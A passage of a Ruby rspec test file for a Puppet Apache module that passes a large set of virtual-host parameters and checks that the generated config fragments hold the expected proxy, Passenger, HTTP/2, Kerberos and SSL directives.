'passenger_debugger' => false,
},
],
'error_log' => false,
'error_log_file' => 'httpd_error_log',
'error_log_syslog' => true,
'error_log_format' => ['[%t] [%l] %7F: %E: [client\ %a] %M% ,\ referer\ %{Referer}i'],
'error_documents' => 'true',
'fallbackresource' => '/index.php',
'scriptalias' => '/usr/lib/cgi-bin',
'scriptaliases' => [
{
'alias' => '/myscript',
'path' => '/usr/share/myscript',
},
{
'aliasmatch' => '^/foo(.*)',
'path' => '/usr/share/fooscripts$1',
},
],
'limitreqfieldsize' => 8190,
'limitreqfields' => 100,
'limitreqline' => 8190,
'limitreqbody' => 0,
'proxy_dest' => '/',
'proxy_pass' => [
{
'path' => '/a',
'url' => 'http://backend-a/',
'keywords' => ['noquery', 'interpolate'],
'no_proxy_uris' => ['/a/foo', '/a/bar'],
'no_proxy_uris_match' => ['/a/foomatch'],
'reverse_cookies' => [
{
'path' => '/a',
'url' => 'http://backend-a/',
},
{
'domain' => 'foo',
'url' => 'http://foo',
},
],
'params' => {
'retry' => '0',
'timeout' => '5',
},
'setenv' => ['proxy-nokeepalive 1', 'force-proxy-request-1.0 1'],
},
],
'proxy_pass_match' => [
{
'path' => '/a',
'url' => 'http://backend-a/',
'keywords' => ['noquery', 'interpolate'],
'no_proxy_uris' => ['/a/foo', '/a/bar'],
'no_proxy_uris_match' => ['/a/foomatch'],
'params' => {
'retry' => '0',
'timeout' => '5',
},
'setenv' => ['proxy-nokeepalive 1', 'force-proxy-request-1.0 1'],
},
],
'proxy_requests' => false,
'suphp_addhandler' => 'foo',
'suphp_engine' => 'on',
'suphp_configpath' => '/var/www/html',
'php_admin_flags' => ['foo', 'bar'],
'php_admin_values' => ['true', 'false'],
'no_proxy_uris' => '/foo',
'no_proxy_uris_match' => '/foomatch',
'proxy_preserve_host' => true,
'proxy_add_headers' => true,
'proxy_error_override' => true,
'redirect_source' => '/bar',
'redirect_dest' => '/',
'redirect_status' => 'temp',
'redirectmatch_status' => ['404'],
'redirectmatch_regexp' => ['\.git$'],
'redirectmatch_dest' => ['http://www.example.com'],
'headers' => 'Set X-Robots-Tag "noindex, noarchive, nosnippet"',
'request_headers' => ['append MirrorID "mirror 12"'],
'rewrites' => [
{
'rewrite_rule' => ['^index\.html$ welcome.html'],
},
],
'filters' => [
'FilterDeclare COMPRESS',
'FilterProvider COMPRESS DEFLATE resp=Content-Type $text/html',
'FilterProvider COMPRESS DEFLATE resp=Content-Type $text/css',
'FilterProvider COMPRESS DEFLATE resp=Content-Type $text/plain',
'FilterProvider COMPRESS DEFLATE resp=Content-Type $text/xml',
'FilterChain COMPRESS',
'FilterProtocol COMPRESS DEFLATE change=yes;byteranges=no',
],
'rewrite_base' => '/',
'rewrite_rule' => '^index\.html$ welcome.html',
'rewrite_cond' => '%{HTTP_USER_AGENT} ^MSIE',
'rewrite_inherit' => true,
'setenv' => ['FOO=/bin/true'],
'setenvif' => 'Request_URI "\.gif$" object_is_image=gif',
'setenvifnocase' => 'REMOTE_ADDR ^127.0.0.1 localhost=true',
'block' => 'scm',
'wsgi_application_group' => '%{GLOBAL}',
'wsgi_daemon_process' => { 'foo' => { 'python-home' => '/usr' }, 'bar' => {} },
'wsgi_daemon_process_options' => {
'processes' => '2',
'threads' => '15',
'display-name' => '%{GROUP}',
},
'wsgi_import_script' => '/var/www/demo.wsgi',
'wsgi_import_script_options' => {
'process-group' => 'wsgi',
'application-group' => '%{GLOBAL}',
},
'wsgi_process_group' => 'wsgi',
'wsgi_script_aliases' => {
'/' => '/var/www/demo.wsgi',
},
'wsgi_script_aliases_match' => {
'^/test/(^[/*)' => '/var/www/demo.wsgi',
},
'wsgi_pass_authorization' => 'On',
'custom_fragment' => '#custom string',
'itk' => {
'user' => 'someuser',
'group' => 'somegroup',
},
'wsgi_chunked_request' => 'On',
'action' => 'foo',
'fastcgi_server' => 'localhost',
'fastcgi_socket' => '/tmp/fastcgi.socket',
'fastcgi_dir' => '/tmp',
'fastcgi_idle_timeout' => '120',
'additional_includes' => '/custom/path/includes',
'apache_version' => '2.4',
'use_optional_includes' => true,
'suexec_user_group' => 'root root',
'allow_encoded_slashes' => 'nodecode',
'use_canonical_name' => 'dns',
'h2_copy_files' => false,
'h2_direct' => true,
'h2_early_hints' => false,
'h2_max_session_streams' => 100,
'h2_modern_tls_only' => true,
'h2_push' => true,
'h2_push_diary_size' => 256,
'h2_push_priority' => [
'application/json 32',
],
'h2_push_resource' => [
'/css/main.css',
'/js/main.js',
],
'h2_serialize_headers' => false,
'h2_stream_max_mem_size' => 65_536,
'h2_tls_cool_down_secs' => 1,
'h2_tls_warm_up_size' => 1_048_576,
'h2_upgrade' => true,
'h2_window_size' => 65_535,
'passenger_enabled' => false,
'passenger_base_uri' => '/app',
'passenger_ruby' => '/usr/bin/ruby1.9.1',
'passenger_python' => '/usr/local/bin/python',
'passenger_nodejs' => '/usr/bin/node',
'passenger_meteor_app_settings' => '/path/to/some/file.json',
'passenger_app_env' => 'test',
'passenger_app_root' => '/usr/share/myapp',
'passenger_app_group_name' => 'app_customer',
'passenger_app_start_command' => 'start-my-app',
'passenger_app_type' => 'rack',
'passenger_startup_file' => 'bin/www',
'passenger_restart_dir' => 'tmp',
'passenger_spawn_method' => 'direct',
'passenger_load_shell_envvars' => false,
'passenger_rolling_restarts' => false,
'passenger_resist_deployment_errors' => true,
'passenger_user' => 'sandbox',
'passenger_group' => 'sandbox',
'passenger_friendly_error_pages' => false,
'passenger_min_instances' => 1,
'passenger_max_instances' => 30,
'passenger_max_preloader_idle_time' => 600,
'passenger_force_max_concurrent_requests_per_process' => 10,
'passenger_start_timeout' => 600,
'passenger_concurrency_model' => 'thread',
'passenger_thread_count' => 5,
'passenger_max_requests' => 1000,
'passenger_max_request_time' => 2,
'passenger_memory_limit' => 64,
'passenger_stat_throttle_rate' => 5,
'passenger_pre_start' => 'http://localhost/myapp',
'passenger_high_performance' => true,
'passenger_buffer_upload' => false,
'passenger_buffer_response' => false,
'passenger_error_override' => true,
'passenger_max_request_queue_size' => 10,
'passenger_max_request_queue_time' => 2,
'passenger_sticky_sessions' => true,
'passenger_sticky_sessions_cookie_name' => '_nom_nom_nom',
'passenger_sticky_sessions_cookie_attributes' => 'Nom=nom; Secure;',
'passenger_allow_encoded_slashes' => true,
'passenger_app_log_file' => '/app/log/file',
'passenger_debugger' => true,
'passenger_lve_min_uid' => 500,
'add_default_charset' => 'UTF-8',
'jk_mounts' => [
{ 'mount' => '/*', 'worker' => 'tcnode1' },
{ 'unmount' => '/*.jpg', 'worker' => 'tcnode1' },
],
'auth_kerb' => true,
'krb_method_negotiate' => 'off',
'krb_method_k5passwd' => 'off',
'krb_authoritative' => 'off',
'krb_auth_realms' => ['EXAMPLE.ORG', 'EXAMPLE.NET'],
'krb_5keytab' => '/tmp/keytab5',
'krb_local_user_mapping' => 'off',
'http_protocol_options' => 'Strict LenientMethods Allow0.9',
'keepalive' => 'on',
'keepalive_timeout' => '100',
'max_keepalive_requests' => '1000',
'protocols' => ['h2', 'http/1.1'],
'protocols_honor_order' => true,
'auth_oidc' => true,
'oidc_settings' => { 'ProviderMetadataURL' => 'https://login.example.com/.well-known/openid-configuration',
'ClientID' => 'test',
'RedirectURI' => 'https://login.example.com/redirect_uri',
'ProviderTokenEndpointAuth' => 'client_secret_basic',
'RemoteUserClaim' => 'sub',
'ClientSecret' => 'aae053a9-4abf-4824-8956-e94b2af335c8',
'CryptoPassphrase' => '4ad1bb46-9979-450e-ae58-c696967df3cd' },
}
end
it { is_expected.to compile }
it { is_expected.not_to contain_file('/var/www/foo') }
it { is_expected.to contain_class('apache::mod::ssl') }
it {
is_expected.to contain_file('ssl.conf').with(
content: %r{^\s+SSLHonorCipherOrder On$},
)
}
it {
is_expected.to contain_file('ssl.conf').with(
content: %r{^\s+SSLPassPhraseDialog builtin$},
)
}
it {
is_expected.to contain_file('ssl.conf').with(
content: %r{^\s+SSLSessionCacheTimeout 300$},
)
}
it { is_expected.to contain_class('apache::mod::mime') }
it { is_expected.to contain_class('apache::mod::vhost_alias') }
it { is_expected.to contain_class('apache::mod::wsgi') }
it { is_expected.to contain_class('apache::mod::suexec') }
it { is_expected.to contain_class('apache::mod::passenger') }
it {
is_expected.to contain_file('/var/www/logs').with('ensure' => 'directory',
'mode' => '0600')
}
it { is_expected.to contain_class('apache::mod::rewrite') }
it { is_expected.to contain_class('apache::mod::alias') }
it { is_expected.to contain_class('apache::mod::proxy') }
it { is_expected.to contain_class('apache::mod::proxy_http') }
it { is_expected.to contain_class('apache::mod::fastcgi') }
it { is_expected.to contain_class('apache::mod::headers') }
it { is_expected.to contain_class('apache::mod::filter') }
it { is_expected.to contain_class('apache::mod::env') }
it { is_expected.to contain_class('apache::mod::setenvif') }
it {
is_expected.to contain_concat('30-rspec.example.com.conf').with('owner' => 'root',
'mode' => '0644',
'require' => 'Package[httpd]',
'notify' => 'Class[Apache::Service]')
}
if facts[:os]['release']['major'].to_i >= 18 && facts[:os]['name'] == 'Ubuntu'
it {
is_expected.to contain_file('30-rspec.example.com.conf symlink').with('ensure' => 'link',
'path' => "/etc/#{apache_name}/sites-enabled/30-rspec.example.com.conf")
}
end
it { is_expected.to contain_concat__fragment('rspec.example.com-apache-header') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+LimitRequestFieldSize 8190$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+LimitRequestFields 100$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+LimitRequestLine 8190$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+LimitRequestBody 0$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-docroot') }
it { is_expected.to contain_concat__fragment('rspec.example.com-aliases') }
it { is_expected.to contain_concat__fragment('rspec.example.com-itk') }
it { is_expected.to contain_concat__fragment('rspec.example.com-fallbackresource') }
it { is_expected.to contain_concat__fragment('rspec.example.com-directories') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<Proxy "\*">$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Include\s'\/custom\/path\/includes'$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Include\s'\/custom\/path\/another_includes'$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+H2CopyFiles\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+H2PushResource\s/foo.css$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+H2PushResource\s/foo.js$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require valid-user$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all denied$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all granted$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<RequireAll>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<\/RequireAll>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all-valid1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all-valid2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<RequireNone>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<\/RequireNone>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require none-valid1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require none-valid2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<RequireAny>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<\/RequireAny>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require any-valid1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require any-valid2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+LDAPReferrals off$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+ProxyPass http://backend-b/ retry=0 timeout=5 noquery interpolate$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Options\sIndexes\sFollowSymLinks\sMultiViews$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+IndexOptions\sFancyIndexing$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+IndexStyleSheet\s'\/styles\/style\.css'$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+DirectoryIndex\sdisabled$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+SetOutputFilter\soutput_filter$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+SetInputFilter\sinput_filter$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<Limit GET HEAD>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{\s+<Limit GET HEAD>\s*Require valid-user\s*<\/Limit>}m,
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+<LimitExcept GET HEAD>$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{\s+<LimitExcept GET HEAD>\s*Require valid-user\s*<\/LimitExcept>}m,
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Dav\sfilesystem$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+DavDepthInfinity\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+DavMinTimeout\s600$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerEnabled\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerBaseURI\s/app$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerRuby\s/path/to/ruby$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerPython\s/path/to/python$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerNodejs\s/path/to/nodejs$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMeteorAppSettings\s/path/to/file\.json$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAppEnv\sdemo$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAppRoot\s/var/www/node-app$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAppGroupName\sfoo_bar$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAppType\snode$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerStartupFile\sstart\.js$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerRestartDir\stemp$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerLoadShellEnvvars\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerRollingRestarts\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerResistDeploymentErrors\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerUser\snodeuser$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerGroup\snodegroup$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerFriendlyErrorPages\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMinInstances\s7$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxInstances\s9$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerForceMaxConcurrentRequestsPerProcess\s12$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerStartTimeout\s10$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerConcurrencyModel\sthread$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerThreadCount\s20$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxRequests\s2000$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxRequestTime\s1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMemoryLimit\s32$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerHighPerformance\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerBufferUpload\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerBufferResponse\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerErrorOverride\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxRequestQueueSize\s120$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerMaxRequestQueueTime\s5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerStickySessions\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerStickySessionsCookieName\s_delicious_cookie$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerAllowEncodedSlashes\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+PassengerDebugger\sOff$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-additional_includes') }
it { is_expected.to contain_concat__fragment('rspec.example.com-logging') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging')
.with_content(%r{^\s+ErrorLogFormat "\[%t\] \[%l\] %7F: %E: \[client\\ %a\] %M% ,\\ referer\\ %\{Referer\}i"$})
}
it { is_expected.to contain_concat__fragment('rspec.example.com-serversignature') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-access_log') }
it { is_expected.to contain_concat__fragment('rspec.example.com-action') }
it { is_expected.to contain_concat__fragment('rspec.example.com-block') }
it { is_expected.to contain_concat__fragment('rspec.example.com-error_document') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{retry=0},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{timeout=5},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{SetEnv force-proxy-request-1.0 1},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{SetEnv proxy-nokeepalive 1},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{noquery interpolate},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyPreserveHost On},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyAddHeaders On},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyPassReverseCookiePath\s+\/a\s+http:\/\/},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyPassReverseCookieDomain\s+foo\s+http:\/\/foo},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-redirect') }
it { is_expected.to contain_concat__fragment('rspec.example.com-rewrite') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-rewrite').with(
content: %r{^\s+RewriteOptions Inherit$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-scriptalias') }
it { is_expected.to contain_concat__fragment('rspec.example.com-serveralias') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-setenv').with_content(
%r{SetEnv FOO=/bin/true},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-setenv').with_content(
%r{SetEnvIf Request_URI "\\.gif\$" object_is_image=gif},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-setenv').with_content(
%r{SetEnvIfNoCase REMOTE_ADDR \^127.0.0.1 localhost=true},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-ssl') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-ssl').with(
content: %r{^\s+SSLOpenSSLConfCmd\s+DHParameters "foo.pem"$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-sslproxy') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyEngine On$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyCheckPeerCN\s+on$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyCheckPeerName\s+on$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyCheckPeerExpire\s+on$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyCipherSuite\s+HIGH$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-sslproxy').with(
content: %r{^\s+SSLProxyProtocol\s+TLSv1.2$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-suphp') }
it { is_expected.to contain_concat__fragment('rspec.example.com-php_admin') }
it { is_expected.to contain_concat__fragment('rspec.example.com-header') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-filters').with(
content: %r{^\s+FilterDeclare COMPRESS$},
)
}
it { is_expected.to contain_concat__fragment('rspec.example.com-requestheader') }
it { is_expected.to contain_concat__fragment('rspec.example.com-wsgi') }
it { is_expected.to contain_concat__fragment('rspec.example.com-custom_fragment') }
it { is_expected.to contain_concat__fragment('rspec.example.com-fastcgi') }
it { is_expected.to contain_concat__fragment('rspec.example.com-suexec') }
it { is_expected.to contain_concat__fragment('rspec.example.com-allow_encoded_slashes') }
it { is_expected.to contain_concat__fragment('rspec.example.com-passenger') }
it { is_expected.to contain_concat__fragment('rspec.example.com-charsets') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-security') }
it { is_expected.to contain_concat__fragment('rspec.example.com-file_footer') }
it {
is_expected.to contain_concat__fragment('rspec.example.com-jk_mounts').with(
content: %r{^\s+JkMount\s+\/\*\s+tcnode1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-jk_mounts').with(
content: %r{^\s+JkUnMount\s+\/\*\.jpg\s+tcnode1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbMethodNegotiate\soff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbAuthoritative\soff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbAuthRealms\sEXAMPLE.ORG\sEXAMPLE.NET$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+Krb5Keytab\s\/tmp\/keytab5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbLocalUserMapping\soff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbServiceName\sHTTP$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbSaveCredentials\soff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_kerb').with(
content: %r{^\s+KrbVerifyKDC\son$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http_protocol_options').with(
content: %r{^\s*HttpProtocolOptions\s+Strict\s+LenientMethods\s+Allow0\.9$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-keepalive_options').with(
content: %r{^\s+KeepAlive\son$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-keepalive_options').with(
content: %r{^\s+KeepAliveTimeout\s100$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-keepalive_options').with(
content: %r{^\s+MaxKeepAliveRequests\s1000$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+Protocols\sh2 http/1.1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{^\s+ProtocolsHonorOrder\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2CopyFiles\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2Direct\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2EarlyHints\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2MaxSessionStreams\s100$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2ModernTLSOnly\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2Push\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2PushDiarySize\s256$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2PushPriority\sapplication/json 32$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2PushResource\s/css/main.css$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2PushResource\s/js/main.js$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2SerializeHeaders\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2StreamMaxMemSize\s65536$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2TLSCoolDownSecs\s1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2TLSWarmUpSize\s1048576$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2Upgrade\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2WindowSize\s65535$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerEnabled\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerBaseURI\s/app$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerRuby\s/usr/bin/ruby1\.9\.1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerPython\s/usr/local/bin/python$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerNodejs\s/usr/bin/node$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMeteorAppSettings\s/path/to/some/file.json$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAppEnv\stest$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAppRoot\s/usr/share/myapp$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAppGroupName\sapp_customer$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAppType\srack$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStartupFile\sbin/www$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerRestartDir\stmp$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerSpawnMethod\sdirect$},
)
